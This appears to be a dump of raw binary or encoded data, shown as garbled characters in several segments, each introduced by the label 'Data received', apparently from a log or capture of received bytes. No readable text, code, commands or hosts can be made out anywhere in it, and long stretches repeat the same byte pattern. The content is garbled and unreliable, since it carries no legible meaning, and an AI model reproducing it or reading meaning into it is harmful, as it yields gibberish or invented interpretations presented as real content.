û@1Çkm%P${r$X3µWh=2h%X3µWh?2hvSKü½w($S%½p($^h1hÿ~nÿqñÅçRãî7µµÜ-8+ãíÇµPh:4+ãx¨8Qãã8;{Éh:2n%V¹Dú+»p+Ó8¿óZ¿øµN6ý)ã8z)~bmÇzä 8+ãÌää:+5ii-®+ÿ86ðyã8z,"8+ã X û@1~5X%P${r/$X3µWh?2hçx[~S3çP2{p)f^%{{/f[h?hÿ~ìà4R:ÙÏÆ=}µ}®ÇÂ1Èþ$·ìKH¼c÷Kÿq¢+³P$ã8ä,â×+äµaÀa<"P7uDÔàºpkã;Ømãâ[pI£»p+â8h:XvSIú½pêÿkU%Z¨8+ã5@h6i5WÅ=}µ}Øµî"kÞìàfï'óÜ'×9H£ñ8{S3æVX{p.ÆASMù5a%{x.ÆqSKæ5a%{x/ÆqkÿHhÇqS0ù{p/þH8©Áº8ì/Öj}òÌ#ïi®ùQzS3æVX{p.ÆiSHù5Y&{x.ÆqSKæ5Y&{x/ÆqkÿpiÇqS1ù{p/þpQ{SKü5Wh(h5WÅ=}µ}®Æi0y7á8À1b4·ìK Q>_cçKÿqþ4»sêÃ8þ&³ÔK ßqi0y>à8®¡Ëíä;Èpñ§Ï)¿Äà´Ô'e[Pä84êä9$³Ô'óÄ'=}µ}®ÂÝµÌ~uS0ô½pê{X5P%=óQíÇ~5]%Xh?[{S3æ)§kÇ~SKç5A%{x.òQ9{p)þhh%P)x5m%S3)§hÇ~¤=Q±û5Aþ$ãbv Ïq±\h×zK£ Y±\KÌ{}f]Ñ'µZX_)x5m%[h<S}S3æ)§kÇ~SKç5Y'{x.òQ9{p)þpn%P)x5mÿpS6ù)§nÇ~k5Yà©ËíäæÊ§Ê)¿Äà´Ô'g[Ñ®xh}ÿmQïmP't\W0t\W0t\W0t\ÜT7ü½u;$5>óÆ0+ãsUÍóÕç+ã8÷ÛPö÷xöo$Íó_+)9óÀÔ+)9ÃÀÔ+)9cÀÔ+)9ÓÀÔ+)9ü¤ÀÔ+)Åh)Çn)ÉK)Toäaã8÷Û1¤¹8÷Û ¹8÷·Hö~öLöJbFö\|öÛXö~Hã(+fS¨íF+ã)
Data received	kÀøKÀø+ÀøÀøëÁøËÁø«ÁøÁøkÁøKÁø+ÁøÁøëÂøËÂø«ÂøÂøkÂøKÂø+ÂøÂøëÃøËÃø«ÃøÃøkÃøKÃø+ÃøÃøûÄøëÄøÛÄø»ÄøÄøÄøkÄøKÄø+ÄøÄø+ã8+ã8 ûÓû³;û)3ûæpýÒ²üúü=Äü+ã8+ã8+ã8+ã8ãúâAýcüpý+ã8+ã8+ã8ä8+ã8kä8+ã8×O_ÿÇø«ÇøuÿÿSû«ÇøÉÜ1ÌlÝô»hÓþµä8VÿÇø«ÇøÉÜ1ÈÔþÎÌøº8+uÿ!VûoVûRûÛÙø×vÿnVûnVûíRûÛÙøvÿnVûnVûRûÛÙøvÿ½ ûl ûÜ ûé ûnVûÏwÿ û2 ûÜ ûé ûnVû{wÿË ûw ûÔ ûá û±/û'wÿ+!û«ÇøÓHÿ^!û¼"ûsWÿÇø«ÇøGPÿÇø«Çø/Pÿ[Üø«ÇøRÿ[Üø«ÇøËQÿkÞøËÞø»ÞøÙø«ÚøëÚøHÿi"û#û#ûù#û«ÚøëÚø¾mÍåÌ8¼ÕÿºkÖ1ÌÊþ¹ä8OHÿ+!û«ÇøÿIÿ+!û«Çø¯Iÿ+!û«Çø_Iÿ+!û %ûÉÜ1ÍiÖò¿ÉÿÛý·ä8·ûÿ¯ûÿûÿsûÿgûÿ_ûÿ?ûÿã8ã8.ã8ã8(ã8ã8ã8ÏÎøÎþ¹ÄÊô¾ÏãÎó¼Ã°Îð·Ü1ÈÑä´Öå+ã8µâ¼Ð1»ÉòÌÍµÌ1ÌÉä²üÌÉã ä8ºßãÈhÓþµÄÖþ¿ÄÈô¹Óå¿Ü¹Íþ¼ÝôßðÏÉò¶ÄÁþ¼Ü1ºÝä¹ä8¹Íþ¼ÝôhÖð½ÓýÈÔôÊèÑð°8+ã8,ã8ã8bä8ã8ã8ã8ºä8 ã8qä8ã8ä8ã8Ùä8ã8>ç8,ã8?ç8,ã8<ç8,ã8ã8ã8âä8ã8Ïý8ã8ä8ðä8ä8ã8»ä8ã8Ûä8ã8)ã8)ã8òä8ã8ã8ã8ã8ã8(ã8óä8-ã8ã8¦ä8ã8Âä8ã8ã8òä8_ä8òä8®ä8ã8Mç8ã8ã8ã8ã8ã8ã8ã8ùä8¨ä8µä8,ã8Èý8ã8Nç8°ä8ã8ã8.ã8)ã8ã8,ã8ðõ8ã8\ø8ã8ã8,ã8ã8ã8/ã8ã8ã8,ã8ã8ã8Ú8ã8ëÛ8Ïä8èÛ8Ìä8êÛ8Íä8üÛ8²ä8Ú8ã8ìÛ8±ä8ÔÛ8¶ä8íÛ8·ä8âÛ8´ä8Ú8ã8ØÛ8µä8ÿÛ8»ä8Ú8/ã8 Ú8ã8ÓÛ8¸ä8óÛ8ã8ãÛ8¾ä8ÚÛ8 ã8éÛ8¿ä8ïÛ8¼ä8îÛ8½ä8ÒÛ8¢ä8áÛ8¦ä8ÐÛ8¥ä8ýÛ8«ä8äÛ8©ä8æÛ8ä8àÛ8ä8×Û8ä8þÛ8ä8Íä8;ðÿÏä8ðÿÌä8ðÿ¸ä8ãñÿã8×ñÿã8Ïñÿã8§ñÿã8ñÿ³ä8ñÿã8sñÿ±ä8ñÿ²ä8Sñÿ¶ä83ñÿ·ä8'ñÿã8ñÿ´ä8ñÿã8·ûÿðä8ïòÿã8Ãòÿã8»òÿã8§òÿ ã8òÿóä8òÿµä8còÿºä8Wòÿñä8Kòÿã8#òÿ/ã8òÿã8¯ûÿã8óóÿ,ã8ãóÿã8ïóÿ¾ä8ßóÿ¿ä8Ïóÿ¼ä8¿óÿ½ä8¯óÿ¢ä8óÿã8sóÿ ä8góÿòä8oóÿ£ä8Cóÿ¡ä8;óÿ¦ä8'óÿã8óÿ§ä8óÿ-ã8ãôÿã8ßôÿ)ã8Ïôÿ.ã8ûÿã8«ôÿ«ä8ôÿ¤ä8ôÿ¥ä8{ôÿã8sûÿ¨ä8kôÿ°ä8[ôÿ»ä8Oôÿ(ã8gûÿ©ä8'ôÿä8ôÿ¬ä8÷õÿã8ãõÿä8×õÿä8Çõÿã8¿õÿã8_ûÿã8?ûÿ ã8õÿªä8õÿä8cõÿä8Sõÿä8Cõÿã8Oõÿã8/õÿ ã8õÿ¹ä8óöÿ¯ä8Óöÿä8ÃöÿÈÜãÌÍ1Í×ø·mÿºhâ¼Èþ¹hßõ+ã8ÈÜãÌÍ1°ä¾8ÈÜãÌÍ1µÌ1ÈjÛø·ÚýÌä8ÈÊôÈÃ1ÎÖÿÌÌôÏä8ÈÑä´ÖåÓâ¿ÄÌþºÄÔþµ8ÈÑä´ÖåÏåÞ1Ï×ð°8ÉÜ1ÈÜãÌÍÉÜ1ÍÔôßâÎÓá¿ÊÉÜ1´ÍâÈßÉÉúÌá°ßÎÖÿÌÌøºðÉÊåÌ8ÎÖÿÌÌøºð·ßðÏmøµÄÈãºÊô¾8ÎÖÿÌÌøºãÌÏâÌ8ÎÖÿÌÌøºãÌßå+ã8ÎÉâ¾ÄÜô½ÝôÓÿ¶ä8ÏÍå°Ûå°Ö1ÈÜãÌÍ1¹Ëä°ßõ+ã8ÏÊôÎhÉã ÄÖþ¿Äßü»hÃÌlßò¼hÛó·÷º×ð¿Äßã¹ÊÍÔôÀø¾hÍÍÔôÉþÛã²8ÍÔôµ×ôÉþÉÿ²ä8ÍiÖò¿ÉÿÉåÏá»ÊåÌ8³ÍåhÖãÌÝùÈÔô+ã8°ßÿ¿ÞøÌãÌÉçÌ8°Ôô²Ô1ÉmÌôßà¼ÖòÌä8°Ûá»Éá¹ÛåÌÄÓþÉÿ¿ÉýÈô¹Ìøº8°Ìô¹Ïá¿Ü°Îð·Ü1¾ß
Data received	+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8ã8+ã8ã8+ã8xÍyÔÕøª+ã8+ã8(ã8+ã8+ã8+ã8(ã8+ã8+ã8+ã8ó8ùä8ã8ã8ã8(ã8oÁÿ+ã8_Áÿ+ã8OÁÿ+ã8?Áÿ+ã8/Áÿ+ã8Áÿ+ã8ÿÂÿ+ã8ã8+ã8+ã8+ã8ø+ã8+ã8+ã8ã8ã8)ã8+ã8+ã8+ã8+ã8(Ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8)Ã8(ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8)Ç8)ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8*ã8+ã8# ÿ(ã8+ã8(ã8+ã8+ã8(ã8+ã8+ã8+ã8+ã8+ã8ãÆþ+ã8+ã8+ã8ãÆþ+ã8+ã8+ã8ãÆþ+ã8+ã8+ã8ãÆþ+ã8+ã8+ã8ãÆþ+ã8+ã8+ã8+ã8+ã8ËÛþ+ã8+ã8££ÿ#¤ÿã«ÿ+ã8+ã8+ã8+ã8+ã8+ã8£ÅþëÆþîä8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã(ó(ó(ó(ó(ó(ó(+ã8+ã1Ã1Ã1Ã1Ã1Ã1Ã1+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8
Data received	¿ÏÏD¼µWñI~"¶¸-Å5 ã$2²ßÌ·Ôh%ç <%ÿ2mrµL.53þ-=¿_YËÏÃ×4ª·q,mz¸¢ÂáQ àÛë·ñkÜ\¥Õg% 'ÿá]î5ý\P".(õLØÛOÎ1_«pg+Ü(á5 Ô,É4(-eâEÃ¸Ö»Î¶¢F{-ÆEÎ¡`3;é\|ËKê- E½¨ËÍ9l¡)òsr'pY¶`r]æâ,1>¦Ë÷2çld´êe6Wf·^Ú¦jê 53þ&¾#%Ë@g?-Â/]5Å¬+0s!ÆÓ[w)æ·Y+mþºÅW ú&òá'·ÖÂ ÿu~7ÄçZ!1Ë;Æï_ÔêdÃëüd Ásöò¿2±a;Û)ºóó,¥×c%ºöÕpÅ¼S×ï4Íä~ë¶"ú4¾aàÑ;÷ú[R ¬x±!ójð¹ÖùlíZð`÷glWyÈ»%Ö26}øþ)É (i~æï8 áícë[ÌT0û¯¥4Çp©y7?üÀÒ©È&é5âÁ'öÝR ¥~ÅZ³õìÒ/)Î]:çVÇ3ñôª¬Ä¥¯5«Ýº½òÖù@ÊJÿÙþcµ'fÁÙkd¥·1[{¹½ûÍV®Ï¦Ö/êf¶ÁOéÝ[þäq)Y7!Ïf¶^¨[¢CÖu2kÏUì®é1Þô¬phR@ª{®NÌcST[ìÀ0þ~ìx`ÐZP¸ï~ið )ÂXH?8MÌ;6çÃâÓuË$J¸`n^î PZ4þ¾ëc`0hô¹gU$ßù f3\3Ô1g Ï´ªBD)hÝXJÝßOQ¹pÆÓ·ÌÖïáæ)ÑZ;²»4þëÀ%îÄzpt^ío1óh§yQÙÄ;ûa3ùOS»Ôí{ [nþ}%ÓõV¨W4)ËÖ®61 ô.¿2Â4òá2>EëY¥ûxDì ëI×ó$ÇîohV0÷ûíw!Eð¥Hø¼E~C÷ÛW¿¸vÐN_¼ÿUQhPÁúIuå¾ &ÍYþÅ+ïéí2Ì®rRÿn°©øz¿{JÁâ ÐÉîgç³.xÍMíÊAûC§õ@~^Ñ^!Z Ø£GÝ}1Ø[-Òá"Qós é´Rà:Â0Á¯%YX«¶Y÷9¢N½ËNÿ¦h nCq6yö)j'ÕB=wüÄÛ%bãwBë#dJ\ïYóª¢¾{®gäB½wN¹Â¹>ÿwÄ~ÐÙÊ¹yºQå;µK3R><Kî-øx5:þ-ØFiÒòzuÅ[¯u³® Û² )Â7¬%yIð=]Û`JâÎîÌüòYÊ;¢n×Ì6 Á¿¾ÊuN½Y/ñ÷CÖüéÿbwÖ`Sâêße> }q k0ê ÿ½ô¿kb_ÖHRä-þÑò_ù¯Í\1:øÈËÖ²ë_L8!c\bñdk(F bùbÚy&)'ÌÙ[Ù'´Y')Á-ë ÆbP~0iÐïlWaSÎ/Ëùã<f§w<»ðû+tA Õýj§J¢%Úéúú·Û¢-ë¢ÒµÔÇíDË¼ª\|+åÀkv$.{ø¹/ÒÜÓÉq 1×ûëáúíóÅÆgòxÊ[I@Ï½OÁ¿(¾ ,@)·ïÇ öy-ä[à !æ^+ö'ÇTV!9~¿Yßù7>ÏW{¢Ôv\|OíGÑroÑc^²ÿe_ª07è ËÙï(Ê4(ëa¾Ê:â¢R[)Ê~Î 1)ö¦»ßÊ%ùÃÎ1ñWVwZ[ñlVÐN~8oNÉ¶7'è} §¬ÊN¬AÒ¬)ÖuÉßæ@têRUÇ'S§Ø`´ôR]Ñ/DCðòbWEìQÉ5y%ÿä÷&^ëfÊ"Âô¤D1½AAghòóÀ¿?j!º/Å ¹Ãb!{½×³)ò_/Í5 <fO ^-2þæÅÆ4ÔûÍÑúWùþËÉÝÞN¬-Á¶%Åë³¢2)Hó¯dkÎf¤^Ëæ[¾)tnÿ:¤ÂºN©½ÆÍ½qòÒÍ½?Në ÂuÛè$I½jê¯²îÑ^¬îÂÂ)bÙýD÷»ËJKá»+ÜYòª³2/ÁXàbÓ ò\|ÎhÎ%ÖëòBÿùâE¨PÄ-5{¶ÎÀ'+û3¯¹ÆõÑÁH/ Û¿T0e»)Mê~&R`uã(bÿYÏ#9Ç[ª7eçï(ÉÏâ!ptóöûU¦æ$]Àp¾¾1rÞbï@# û_û(ï!Kó§Ç1¾1{á zÎ[£ ÷UÁ²RZ÷ÉÇwÑB1}ÑÑ÷ª@V,®òÂÓøDKî]K%u®3+~jÀÂeæ×^væÄ'ÇU[¿È©êaÉ5»Ðf,)1IÝ±9¥\|ÌRhÝ#,9¦R}IawÑ»ÌìÃ46û¥ß²æ_ÅÛ¬$¹/Ì¿ÆÉ¿{é!ß÷ìéû±£bÿSÓ/þWrJ¢¡½¢1ò_Î. Óo6é!¹XJ¯)8«tâïÍ\|?b!ÏÞeÏÉñGdT¢ÿ©_©ôYOZ®-y:Òzÿ¢é~éÉx}Ev4ËF!÷ÁX·Ãð$Çÿqï(ÅÐ³ »æçS( ó-çvX1ø ×%«?J%ÿýÜJÿÜß!JþëÙE«îæ©_èÍ/Ð×bÀ:¼×øÅ-íÊ eÃå/ó@'âIa0¹?íôåÇ«ÊáC ÁêòºÖ"8_n:ê=Õí÷nÊ!N Ú!1O÷¦üSÒ þºsù²Þ¸ Æ óÏÚøÍ®éÇ+¿5îÊ_Òk(ÓÙÎ5B%ã© õO§fZ%ÌÔv¬»ùþ¸âÆ×Åm3û ¿EÏ§+)Áï(0È¨+i¥~kðZêþ9éÑ9Gî@¶N«9þp@' k¹ME z£ßÊ®)<p'ûÖ¤Åáù[º§¹Âè²a)\¹òËõ)å*ùå»5î,f -ßß3LO«hß!rËµÅ19B -ê}^Âï¨,¤®ÍLizÈëD5+7¿0ï¹·e÷<«ùÿ 1ÊtÀ'uz3æ^Áª-#jõ¤zèPµ¸Âê1×ÕóOB Ïl
Data received	ÎÅø±¤¯ñäÑßR? ýQÅiÆÊ°Í ¬ë½xiOêí¤ ÀAï>¢hÓ%â÷ÁØ/ÌlÂ¼ J6øîþ®P¸±Aá#w/ÎÓ¶$<ª.-Æ-[îï( ~ÐNÊ¾wlÕ÷®öEÒ{réü¹Å¿®t,ãF%îã0µNzýºÆ]tERAO.é;a Ãa" Ô28×>&)ÖàÉÈ ÞµlZÆùîñÀ!ùuóËQJMy\~²ÍÏ&+øÌ¥¡¡Ï¼±ä®DÂ'·0K¤ÏÇÂ¦òQôýæÏ% ×wKÅ¡ ¼E(ÃÜ´ìc)1÷NÒKïuÅ£5-ò1FZ0Ó,ÿÊ$K¯Ì¹YÛåi}°g)ÊÉT9óËè¢¨áÂ1Z.Ñ´÷2ÎµßèBÒïð}S[ÛÊ[ÞÌlÁD L7±!Â;Æ~)jkãèb.Ùº×1ôú;£C!ÿÌb)RÉ~J^_Òó«7îu0³+û»Û ÅÌ¯÷$X¢× ð1_òæJ úðæ £%J8ÊíO!u Â·ë«ãJ2HãÿÇ8Ezº¨¸¤»Ï%ºÎkuu)ucñÿ²ðÊò$)ù¾¯è¥ºÝÚ!má_ß%ñ@åÉuÊ2iðQR\ö N¬ ¢êÕgTÏê$Ò%x°åÙMFEY®âìÖxIZ"ßæÒ ÁDN×èÂ/dÆELqD'UÖ$¬ø!ÎÖÅêê3¯Ï÷ÌÉþ!~aâ© u ``6S5ÛSOáïkèþ¦X¡9ÕÒRóõìBã~Kâû9ßíø×õ]ã2øû«ÒÅ-? Ö9VÀÄ$Ùâ3â; \Å» (Qóp!0÷Ö¾üå5DzëI öÀÔÌ¾ (û)UØL·Á¬9 Øõe%ñºÂê-4 4µdÑ+ÎÚ%_ÌÌå5°"zé@òÕçðÔUe§½n4 ø »²m%\te ûq7Ø1É¸{øÕ¦~9ÈÀLÒp+È3b.%¢ ÐÂä} êîvZÇ(ýØéæ%_s¶Æ:òÒ9µý©Î÷·yZ¶0vxþ¡çùjI£«À Þ¾vrSúÖwôqéqð/ÁÑî:)À%èvä¯ügÚ°êQèIWYtdæ®£"-Î`þP§Øk®}Ú'Ù1à)ðÿ3¡«;).¼éÄ!ùãj/îökqâôÍþJpÙé;ª) >ÚøÄåÙø8§Ö¼ûæ(Ê8NûÄöÊN®ÈN«x>ºyÂaâ/¦(wR×%¨°(Å§ ²#)ó/±>;+êdÀ!d:Vý³Àñ,c' Rô/)úQ!Í-Vh\Ê²0Ä1þ2¯ÝÛKÄe)´®µdé_çuGÎ'ÞGÄÇê¹9×È4ÿ$ÏG¿ÿ¶~¨5ÖP)/ÄÙêò¶ í=Ó3:«`®ÃË 1ÖL£¡U]'îÄÉïùû-A+)?(A<Q¿¬»ÈãA!ß)t¶stMè³Ktv½i/ey¾Zº)ôzµ¾tkëÙã]¦÷ «yxÿ1tÿåcÃ%º]^5Ý8Æ^e;äÏÄJ%î¸ HÑú§ó±H>qË$R[»ßå-®\§}±Nç!\Ë5A+6¦ ó-ÅØât~·\ÆR c!Ó)Á¾ëÏÎ UGKÃ¬ò²÷w5ë£ôÃ¬Ê(%O1å5uççëá¯²y ]åo!éº/ÿëWÐ«©/ê Ò9nÊ?2¸TqRâ&U9Þ»>®(â)8S «[¨9ÆjÕWvS¢î÷l'!w2,ÿÓ¦!e!¶)þa÷¿ û¾05ª/ï:².K@rÖ®êûÂê@ô½P Êø¿âïO®Qú²]îúË-ë\|÷ÏÖêbà×÷nå¹kúëWëªHîº]\òRÌ©/1ÒÂçÞ\|lN5Ãªd)ÆìÕ_þ»t[aJÔ©;Ò¬!ò òèÁßÑ~Ê1öú-ÿe÷ê²çÅ1òý}áÊNÃþa\|Â n({ \ÆiwBfXOÚ« w#$ãZnH89;»²gZcûe¤¿-/2_}tKZß¼$páoÂ3$Wî2Ó`W ÎtOZj4ÔRÂïuþ]Q@bÃ¶!Áç:Z Ø øÔÔqµû1ì (j)Ué®-¦{S÷V !ó5DÓbþü+ÝF¿µ5ÿD[QªHW1Ð)öÑÀÙ>Ùskåék².!Ûû2¸ÀÊæÖûP ÈO-»rÌËöÒAØ0v)OÐ# %ß»wåe¯@!÷"g)Ée¯LZtnâY{äËÌ2ÃøâKë®)Áîâß\ ä¨B3)Uì%%(Å é ÕYçIÖõéw·¦óÖaö1»öWJ³ '¸°¶.ç@¡Q¾£k#3zcZhø)ÞæÝöþ·û'~UØåêry\|-øÕ§özÜ¢ÎZ@){8Ùf¸7¯_{q)>Ê9`$ÒO!¬ VL¨~Ê¯Zðû\|-Yö.- cvQ´6+Ç³«_ó%Ñ¹¯-¬¥.ÑB1ù÷F¨/ AÇsS¥]E÷,iÿ.¶R}§Â{,e¯}gAò.ÙhbÊY«§ù¥~Ä Ï#'+F@-9ÊE@eîà2ç¸1ÙÒ!ÐéÅè_Â:¯ð1Ú Jøþ-}¥² 2`>û¸8Y&ÏÓÄ %éN¹KÒ¥zz÷[ö¢)! ÁÆYküËáÙniÂ\|\ÉPß +·²gWVëZWüËf7J ËöyKBÝE-I% Ö¢þóÔêF)Îi\|tnkTÊib:4FÌ¢'ø²µÁ,Ã Æmµz×ÙÜB!Ö LJµÑöo,}JaÎKK¦ 8Â f1ú}Ê~èÏ¢ýqc¦¯iùkäÿOðñ.ËbCC^î @ÇÙFw%)Ó\|nÖ%5$æ¢éUÛ)¥nøã39¸ó@Î%{BÁºeºó@I+J92´Ê©!×Ó×?Oâ7ºå1¬0Z1 )Ê&!úèÒóÊ.JØ1 aRæ\«$ÉÄYòÁ Ø»=ñH)>\vKnd/Ã¨Å×$´,9cFñó0§øOçêtYûÊj@K1-öÂGü/'Ôé^é\|QiWæ1V:KÿÎ^Kð;æK )ª`ñwöÎ\ vçÉÝñB
Data received	Ãal´KÎþ¬Iâî(ºÒ¼Ôv%Æá î~V @¼üiËþ³¶ ÖëÓêEøïòìÖúÞç~ÅÅÎëjbëöÙoþ¾)°áÓ=93´öÅãþÙ+Ü$æôÉnõ·B!ßö:Éå¨'ýÌ÷.ì÷ÓÄàÎGZÿ¬³µ°}ËÛD¸ûuÆ£$ÛÀÏòêÅò+Ë¸³<ôÍ¸?¦n.êÃ ÑÚh¢iUzØºã·E¥óxKtÎË(§,!3F%ÅQ'âtJRtéÀØ#ñ½¦¦Ï%e5ÊêÁ}×¿c{ýéæAOîÉÏ&ìâ²Åç@èä ÍþØò,ùz¢Ò¯Zþ,ñbÆ¨QmBÎS?!VVX\/~&ÓL%by:SvbÃ~ÙR÷¥1jøË5D[Øe¯ÿ(Ü¾!"W¿(ó7¿ow§^Q%×E/&* ïÒìÄé ²Ðï^"éQékN\Jéî/Çü[âêßEÝ¬¢ª.á[@-18¢ò©¼Tßë2}ð) ò1ñù`o÷õ%gY©7éÉE§d[§Q¼úôË}fäê·SO ÆÛæ1Ø Én³±ó.ñÙIW{/{w)û×uqß¥x1·%3Æ VÑ%÷ÝÅ¯N~d1Ò÷PScJñÂfãA/ëb3pH>ºóv'îÿþ)OÖªeÍX§Ñ¨ëâiJ«uÝl;´Ñ«´úËSó¼û¬ô·VÂ'^ÑP¶iøe\µ[´2:îÝü@ER±b×{§³¦³´=/ÌÒqÝv\|xÄ¿27Q`$³êJ\ºÈc×û_,§ý0àÿü÷zí(PQ¹`úûÀöÉ1}Á§$ïo0j¹Å:÷ÙRmhjÌ×P~,÷\|sÝù¼QrÁÿVÇ8¢¶ãû_ùÇ1Ù[²ÈYUÖgÒénDh9jê¡StÀ^XU½þ§)T1K]9âþ!ö÷ )þ0A%ÆnâøÚÜu\|sR_¹V.ª$Vº² àèPYXAÿØïî0Xþ_Sèóçú×[ª¼â6VTUÔþdÆ W¿U=÷×ªÜªbÂ`(Vÿ¢^\<ªÊP[J4KD ÈNo/äØå]Fý-ÃuÈ-vÿmÀ7SWV¾?»E¿¦å²)÷^9úÓZ_ÒC$ç}Î/ O= Ð'%ß;&R@ÖØqò)Ë+£ýe\Ñ±ßë)ók]÷Â&ØÀÉÀ¦ù ÿI)dé&÷,kÚäÎ_ÁîThÌ?<ù¬XvÍÔ~ìA´Ì~V¨Ê.%^2ÕdP»ûîµÁëRº¢íÞÂb5Ð ®ypè{3À0h&b`BW¸ÅÌßT©ÆÃXQá]çÈ\XÜ/;ª{-^uÌóUÊÊ}~Õh¾Êé_[jiX\|&¼RÝmø0uª$¯H/2Dø}\|;§ñîTi}ÒDvqRUfb,?2mbîßY¿V« ÃuÎ²â=VàÚ7[%,b1Ã]4Z-22[#Dïú²Â(üUb)Ï]ìýNÇ¶ªéòÊ3P)fÅSï(!Â]nã@1yZWFµU}0Zö°Ì®IÙK¿(ïÞÕï@¢6É[¢ËøLm×³¼4Jîeþóç Ãàäa¨Ø¤ª7ýiþ3k] ]´fùAG)Ñ#^^ó`%ÐsÅ<N«È@K#ü¤'(nÕ'ë`;Àø!Ð)y"ºº³ÜââÜIYÂRsâÕ»KÊ2÷C¶ú¬®_1òêÃÿJ0«ÂäÒþ®ÝhÒê¦$Vº@·J¿u\tQ#zÁÔ°e,92úy6ãÂ[¾u\|ûZB_~±Yö:13!þ¶{ÄÆê9,~¡î ,I¤³ë1þáfÚÞNÍæ+¾9;²¾IÅf¯u»µûé'hÁ$ÆöÜzU.öúl½ÛNÉÙæ¬Pµþö"^¹½¤!~Þ+¨à1Ö)åH7Z.%Î¹æoìy¢ZÕÌÀû+Ë¨ZEè1¡° j¹ê$èæËÃñç(¾m£ \|[÷°/Î¾oË}æÂ[¸øi¶$¶RLOø¤dÀ=¸É-WÆBMò«5þ-ÄlóÒð[Èu$1Ù!ËÍd>°=Àµ8£ÕZb/!Ã~-óôP)8/1Ë3â^Î)÷TVüu¤ïÉkõ·t_ù¶Fò(,4Z9¼pr\Ø´ïuDÓýÈj%å (¬»ËùFõDbÑý¦ZZ}Û0ÿLhð!^Ê·è%ÏîbùþP30/)Û2»Ýº=ß{~SÚëW~Éäºº²õ÷¬m¤!m!0¥²ÎXÜûó³K³ÊËTuÐ®ï>ÃòtE äÀ? ÏÚ+<z¾ò×± ó{³£_±ðJ¿bû7_\òßÁNqud KÉ¼<å¢-5ua{è61À»ØÏKÊ>Oýø®i;õÐ+)$?ÑË÷quÂÃg~sPS Ú{QBËüÖi]ñïbÎùºKw¶-àÚ; H4wZÊô8¿KÝB?1aómëï8-~!Bê Êþ×§E¯'^ÞØÆ¹ip¹'Ç¬e,4Dëì¤Å»¶<Z4¯Vïm1`øn± kµêYÄºW0y:N© SZ¯Pµ aÊÀÄ1Ð^im:§JÛ!À&ô1fª²,¯Ý=KÄÔïáöd}1µþRN¦Û ëQI 